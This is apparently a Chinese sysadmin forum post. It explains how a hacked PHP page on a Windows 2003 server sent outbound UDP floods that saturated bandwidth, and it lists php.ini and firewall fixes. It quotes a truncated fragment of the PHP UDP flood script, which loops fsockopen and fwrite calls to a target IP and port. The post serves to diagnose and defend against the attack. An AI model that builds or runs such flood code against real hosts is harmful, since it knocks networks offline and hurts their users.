win2003遭受udp攻击导致带宽占用很大

后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的, 以下为转帖: 关于近期一些服务器遭受UDP攻击的说明 近来我有一两台服务器显示经常受到udp攻击 导致服务器带宽占用到100%，用华盾查流量占用也无法查到具体是哪个站被攻击了，起初以为是cc攻击，因为停止了iis带宽就为0了，其实不然，都是部分用户被入侵导致的 下面我想说一下被入侵的原理 用户程序中的一个php页面的原代码: $max_time){ break; } $fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\"; ?> baidu了一下工作原理： 先把你代码放到一个正常的网页中. 通过url传递IP和端口以udp的方式打开.传递文件到服务器写出. 这样服务器就中招了. 也就是服务器显示udp攻击，带宽占用非常之严重，基本是100%，一般徘徊在97%-99%之间 解决方案： 在php.ini中限制php用网络。 在php.ini里设其值为Off allow_url_fopen = Off 并且: ;extension=php_sockets.dll 前面的;号一定要有,意思就是限制用sockets.dll 然后重启IIS 我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.